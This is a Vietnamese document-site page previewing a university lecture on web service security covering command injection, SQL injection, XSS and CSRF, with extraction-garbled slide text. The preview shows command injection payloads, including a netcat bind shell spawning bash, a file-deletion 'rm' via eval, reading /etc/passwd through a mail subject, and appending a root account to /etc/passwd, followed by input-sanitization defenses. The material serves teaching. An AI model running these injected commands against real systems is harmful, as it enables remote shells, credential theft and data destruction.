Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Sức khỏe - Y tế
Văn bản luật
Nông Lâm Ngư
Kỹ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Giới thiệu
Đăng ký
Đăng nhập
Tìm
Danh mục
Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Y tế sức khỏe
Văn bản luật
Nông lâm ngư
Kĩ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Thông tin
Điều khoản sử dụng
Quy định bảo mật
Quy chế hoạt động
Chính sách bản quyền
Giới thiệu
Đăng ký
Đăng nhập
0
Trang chủ
Công Nghệ Thông Tin
An ninh - Bảo mật
Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF
tailieunhanh - Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF
Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tổng quan về hoạt động của dịch vụ Web; tấn công dạng Command Injection; SQL Injection; XSS; CSRF; quản lý phiên; . Mời các bạn cùng tham khảo! | BÀI 9. AN TOÀN DỊCH VỤ WEB SQL INJECTION XSS CSRF Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 1 Nội dung Tổng quan về hoạt động của dịch vụ Web Tấn công dạng Command Injection SQL Injection XSS CSRF Quản lý phiên 2 1 1. TẤN CÔNG DẠNG COMMAND INJECTION Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 3 Command Injection Lợi dụng lỗ hổng không kiểm soát giá trị các đối số khi thực thi kịch bản servlet trên web server Không phân biệt được dữ liệu và mã nguồn trong đối số Ví dụ Website chứa servlet cung cấp tính năng tính toán biểu thức bất kỳ qua hàm eval http in _GET exp Nội dung biểu thức được truyền eval ans . in . qua đối số exp. Ví dụ http exp 1 1 Servlet thực thi như thế nào nếu truyền đối số như sau http exp 10 system rm . 4 2 Command Injection Ví dụ khác 1. http exec Client Server 2. Send page Ping for FREE Enter an IP address below Ô nhập dữ liệu 6 3 Command Injection Ví dụ khác Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 7 Command Injection Ví dụ khác ls Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 8 4 Command Injection Ví dụ khác Thực thi shell ip 26 netcat -v - e bin bash -l -p 31337 amp submit submit netcat v e bin bash l p 31337 9 Command Injection Ví dụ khác Mã PHP để gửi email email _POST email subject _POST subject system mail email s subject lt tmp joinmynetwork Chèn mã thực thi khi truyền giá trị cho đối số http email hacker@ amp subject foo lt usr passwd ls Hoặc http email hacker@ amp subject foo echo evil 0 0 root bin sh quot gt gt etc passwd ls 10 5 Phòng chống Kiểm tra chỉ chấp nhận giá trị chứa các ký tự hợp lệ Ký tự nào là hợp lệ Phụ thuộc ngữ cảnh Làm sạch đầu vào input sanitization Xác định các ký tự đặc biệt không nên xuất .
Hoài Việt
16
31
pdf
Báo lỗi
Trùng lắp nội dung
Văn hóa đồi trụy
Phản động
Bản quyền
File lỗi
Khác
Upload
Tải xuống
đang nạp các trang xem trước
Không thể tạo bản xem trước, hãy bấm tải xuống
Tải xuống
TÀI LIỆU LIÊN QUAN
Bài giảng An ninh mạng máy tính - Chương 8: Các giao thức an ninh thông dụng (ThS. Lương Minh Huấn)
57
115
5
Bài giảng An ninh mạng máy tính - Chương 1: Tổng quan về an ninh mạng máy tính (ThS. Lương Minh Huấn)
126
127
7
Đề cương bài giảng học phần An ninh mạng
6
203
3
Bài giảng An ninh mạng – Chương 1: Giới thiệu (TS Nguyễn Đại Thọ)
18
158
3
Bài giảng An ninh mạng: Chương 1 - ThS. Trần Bá Nhiệm
22
168
4
Đề cương chi tiết bài giảng An ninh mạng
6
93
4
Bài giảng An ninh mạng máy tính - Chương 7: An ninh tầng giao vận (ThS. Lương Minh Huấn)
45
102
4
Bài giảng An ninh mạng - Chương 5: Bảo đảm an toàn mạng
52
120
2
Bài giảng An toàn bảo mật mạng: Chương 1 - ThS. Trần Đắc Tốt
96
213
7
Bài giảng An toàn và an ninh mạng – Bùi Trọng Tùng
33
311
18
TÀI LIỆU XEM NHIỀU
Một Case Về Hematology (1)
8
462282
61
Giới thiệu :Lập trình mã nguồn mở
14
24823
79
Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13
11280
542
Câu hỏi và đáp án bài tập tình huống Quản trị học
14
10506
466
Phân tích và làm rõ ý kiến sau: “Bài thơ Tự tình II vừa nói lên bi kịch duyên phận vừa cho thấy khát vọng sống, khát vọng hạnh phúc của Hồ Xuân Hương”
3
9784
108
Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249
8876
1160
Tiểu luận: Nội dung tư tưởng Hồ Chí Minh về đạo đức
16
8461
426
Mẫu đơn thông tin ứng viên ngân hàng VIB
8
8089
2279
Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152
7463
1763
Đề tài: Dự án kinh doanh thời trang quần áo nữ
17
7184
268
TỪ KHÓA LIÊN QUAN
An ninh - Bảo mật
Bài giảng An ninh mạng
An ninh mạng
Network Security
An toàn dịch vụ web
SQL injection
Quản lý phiên
Truy vấn cơ sở dữ liệu
Bài giảng An ninh mạng máy tính
An ninh mạng máy tính
Giao thức an ninh mạng
An ninh lớp ứng dụng
An ninh lớp truyền tải
An ninh lớp mạng
An ninh lớp liên kết dữ liệu
An ninh máy tính
An ninh thông tin
Phương pháp tấn công an ninh mạng
An toàn bảo mật thông tin
Đề cương bài giảng An ninh mạng
Nền tảng của an ninh mạng
Nguy cơ mất an ninh mạng
Mục tiêu an ninh mạng
Mô hình an ninh truy nhập mạng
Kiến trúc an ninh OSI
Dịch vụ an ninh
Đảm bảo an ninh thông tin
Cơ chế an ninh
Đề cương bài giảng
Lập kế hoạch an ninh mạng
An ninh tầng giao vận
An ninh tầng transport
Bảo mật tầng giao vận
Giao thức SSH
Chứng chỉ kỹ thuật số
Chương 5 Bảo đảm an toàn mạng
Bảo đảm an toàn mạng
Biện pháp đảm bảo an ninh mạng
Bài giảng An toàn bảo mật mạng
An toàn thông tin mạng
Bảo mật thông tin mạng
Nguyên tắc nền tảng của an ninh mạng
Các nguy cơ mất an ninh mạng
Các mục tiêu an ninh mạng
Lập kế hoạch an ninh mạng
Bài giảng An toàn và an ninh mạng
Cơ chế an toàn an ninh
Hệ thống tấn công thụ động
Dịch vụ an toàn an ninh
Mô hình an toàn mạng
Bảo mật mạng
Mạng thông tin
Tấn công mạng
An toàn mạng
An toàn an ninh mạng
Cơ chế an toàn bảo mật
Xây dựng hệ thống an toàn bảo mật
An toàn thông tin
Quản lý nhà nước về an ninh mạng
Kỹ thuật bảo đảm an ninh mạng
Pháp luật về an ninh mạng
Bài giảng Kỹ thuật an toàn mạng
Các vấn đề an ninh an toàn mạng
Kỹ thuật an toàn mạng
Học phần An ninh mạng
Tấn công mạng máy tính
Kỹ thuật tấn công mạng máy tính
Mô hình tấn công mạng
Kiến thức tấn công mạng
Mạng riêng ảo
Các loại mạng riêng ảo
Mạng riêng ảo truy cập từ xa
Bảo mật trong mạng riêng ảo
Hệ thống mạng
Mã hóa đối xứng
Mã hóa công khai
An toàn IP
An ninh ở mức IP
Ứng dụng IPSec
Kiến trúc an ninh IP
An toàn bảo mật
Chính sách an toàn bảo mật
Lỗ hổng an toàn bảo mật
Quản lý an toàn thông tin
Hành vi tấn công hệ thống mạng
Đối tượng tấn công mạng
An toàn bảo mật các giao thức mạng
Mạng máy tính
Tấn công giao thức TCP
Mạng TCP/IP
Liên kết dữ liệu
Bài giảng Mã hóa
Dich vụ an ninh mạng
Thiết kế hạ tầng máy tính
Bài giảng Thiết kế hạ tầng máy tính
Thiết kế an ninh
Cơ chế an ninh mạng
Module hóa thiết kế an ninh
Đảm bảo an ninh mạng
Bảo mật thông tin
Truyền thông tin trên mạng
TÀI LIỆU MỚI ĐĂNG
Giáo trình phân tích phương trình vi phân viết dưới dạng thuật toán đặc tính của hệ thống p1
5
149
1
22-11-2024
Báo cáo nghiên cứu khoa học " NÂNG QUAN HỆ KINH TẾ THƯƠNG MẠI VIỆT NAM - TRUNG QUỐC LÊN TẦM CAO THỜI ĐẠI "
8
158
1
22-11-2024
CUỘC KHÁNG CHIẾN CHỐNG THỰC DÂN PHÁP KẾT THÚC (1953 - 1954)_5
11
133
1
22-11-2024
ĐỀ KIỂM TRA GIỮA HỌC KỲ TÂM LÝ Y HỌC – Y ĐỨC
18
238
0
22-11-2024
NGUYÊN NHÂN HÌNH THÀNH VÀ VẮN HÓA XÃ HỘI NGUYÊN THỦY_1
8
138
1
22-11-2024
A Methodology for the Health Sciences - part 3
89
125
0
22-11-2024
Thực hành bệnh tim mạch part 6
54
155
0
22-11-2024
Tổ chức event cho các sản phẩm nhạy cảm
5
142
0
22-11-2024
Giáo trình dịch học bào vệ thực vật part 10
10
174
0
22-11-2024
ĐỀ THI HỌC KỲ II MÔN : VẬT LÝ
4
136
0
22-11-2024
TÀI LIỆU HOT
Mẫu đơn thông tin ứng viên ngân hàng VIB
8
8089
2279
Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152
7463
1763
Ebook Chào con ba mẹ đã sẵn sàng
112
4364
1369
Ebook Tuyển tập đề bài và bài văn nghị luận xã hội: Phần 1
62
6147
1258
Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249
8876
1160
Giáo trình Văn hóa kinh doanh - PGS.TS. Dương Thị Liễu
561
3785
680
Giáo trình Sinh lí học trẻ em: Phần 1 - TS Lê Thanh Vân
122
3909
609
Giáo trình Pháp luật đại cương: Phần 1 - NXB ĐH Sư Phạm
274
4613
562
Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13
11280
542
Bài tập nhóm quản lý dự án: Dự án xây dựng quán cafe
35
4445
490